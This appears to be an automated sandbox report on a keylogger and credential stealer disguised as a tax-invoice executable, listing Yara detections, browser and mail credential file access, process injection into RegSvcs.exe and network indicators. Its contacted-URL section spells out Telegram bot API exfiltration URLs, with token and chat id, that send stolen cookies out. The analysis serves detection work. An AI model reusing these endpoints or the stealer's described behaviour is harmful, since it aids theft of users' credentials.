Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E61E06 GetUserNameW, 0_2_00E61E06
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E53F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00E53F3A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00E249A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_81
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_XP
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_XPe
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_VISTA
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_7
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_8
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Yara detected Credential Stealer
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E96283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00E96283
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E96747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00E96747
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1651004 Sample: (STC) Tax Invoice 25030216_... Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 14 reallyfreegeoip.org 2->14 16 api.telegram.org 2->16 18 2 other IPs or domains 2->18 26 Suricata IDS alerts for network traffic 2->26 28 Found malware configuration 2->28 30 Malicious sample detected (through community Yara rule) 2->30 36 9 other signatures 2->36 7 (STC) Tax Invoice 25030216_REV.exe 2 2->7         started        signatures3 32 Tries to detect the country of the analysis system (by using the IP) 14->32 34 Uses the Telegram API (likely for C&C communication) 16->34 process4 signatures5 38 Binary is likely a compiled AutoIt script file 7->38 40 Writes to foreign memory regions 7->40 42 Maps a DLL or memory area into another process 7->42 10 RegSvcs.exe 15 2 7->10         started        process6 dnsIp7 20 api.telegram.org 149.154.167.220, 443, 49712, 49714 TELEGRAMRU United Kingdom 10->20 22 checkip.dyndns.com 158.101.44.242, 49693, 49700, 49701 ORACLE-BMC-31898US United States 10->22 24 reallyfreegeoip.org 104.21.112.1, 443, 49696, 49699 CLOUDFLARENETUS United States 10->24 44 Tries to steal Mail credentials (via file / registry access) 10->44 46 Tries to harvest and steal browser information (history, passwords, etc) 10->46 signatures8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
104.21.112.1
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
reallyfreegeoip.org 104.21.112.1 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendDocument?chat_id=7128988401&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2029/03/2025%20/%2014:12:19%0D%0ACountry%20Name:%20United%20States%0D%0A[%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] false
        		high
        https://reallyfreegeoip.org/xml/45.92.229.138 false
          		high